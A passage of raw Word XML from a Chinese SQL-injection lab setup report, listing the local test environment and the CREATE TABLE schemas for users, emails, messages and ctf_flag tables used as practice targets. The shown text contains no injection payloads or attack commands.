                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PHP内置开发服务器 / Apache 2.4+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="42853F9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FA954B2">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>后端开发语言</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="30" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="40E0DB5C">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>PHP 7.4+（适配靶场源码）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="28C049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F0725F5">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>数据库服务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="30" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1F1052B9">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>MySQL 8.0+（兼容5.7版本）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4DAD96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1A9B619">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>数据库管理工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="30" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F696F90">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>phpMyAdmin（可选，用于数据查看）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="075E78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3D5EF85">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>渗透测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="30" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1165671F">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Burp Suite Community Edition、curl命令行工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="101DCD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73FC363">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>实验靶场</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="30" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="249B957B">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>sqli-labs 开源完整版（含基础注入关卡）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3FA24C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3334FCFB">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>本地访问地址</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="30" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6E4B7569">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:ind w:left="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>http://localhost:8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27F543FA">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="heading_8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.2 数据库结构设计</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="0915F92A">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本次实验自定义</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>数据库，包含4张核心数据表，分别适配用户数据、邮箱数据、搜索消息、Flag验证场景，完整支撑全类型注入测试。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042371E5">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="heading_9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.2.1 users核心用户表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="1F53F39C">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>存储测试用户账号、密码核心数据，是注入拖库的核心目标表：</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086ABB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4036176">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CREATE TABLE users (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    id       INT(3) NOT NULL AUTO_INCREMENT COMMENT '用户ID',</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    username VARCHAR(20) NOT NULL COMMENT '用户名',</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    password VARCHAR(20) NOT NULL COMMENT '用户密码',</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    PRIMARY KEY (id)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8 COMMENT='核心用户数据表';</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23D32DF8">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>预置10条测试用户数据，覆盖常规测试场景。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DBD222">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="heading_10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.2.2 emails邮箱数据表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="4C782BE1">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>存储用户关联邮箱信息，用于多表联合注入测试：</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CBF14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4FD4050">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CREATE TABLE emails (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    id      INT(3) NOT NULL AUTO_INCREMENT COMMENT '邮箱ID',</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    email   VARCHAR(50) NOT NULL COMMENT '用户邮箱',</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    user_id INT(3) DEFAULT NULL COMMENT '关联用户ID',</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    PRIMARY KEY (id)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='用户邮箱数据表';</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="662A1B55">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="heading_11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.2.3 messages消息数据表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="6278C62C">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>存储前台展示消息数据，适配搜索型LIKE注入场景：</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655EA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2813406">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CREATE TABLE messages (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    id      INT(3) NOT NULL AUTO_INCREMENT COMMENT '消息ID',</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    title   VARCHAR(100) NOT NULL COMMENT '消息标题',</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    content TEXT NOT NULL COMMENT '消息内容',</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    user_id INT(3) DEFAULT NULL COMMENT '发布用户ID',</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    PRIMARY KEY (id)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='前台消息数据表';</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EEA13DD">
      <w:pPr>
        <w:spacing w:before="260" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="heading_12"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.2.4 ctf_flag验证数据表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="1DFC5E32">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="等线" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>存储隐藏Flag数据，用于验证深度注入脱库效果：</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59151A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212B3BB">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CREATE TABLE ctf_flag (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    id    INT(1) NOT NULL AUTO_INCREMENT COMMENT 'FlagID',</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">    flag  VARCHAR(64) NOT NULL COMMENT '验证Flag',</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:br w:type="textWrapping"/>
            </w:r>
            <w:r>
              <w:rPr>
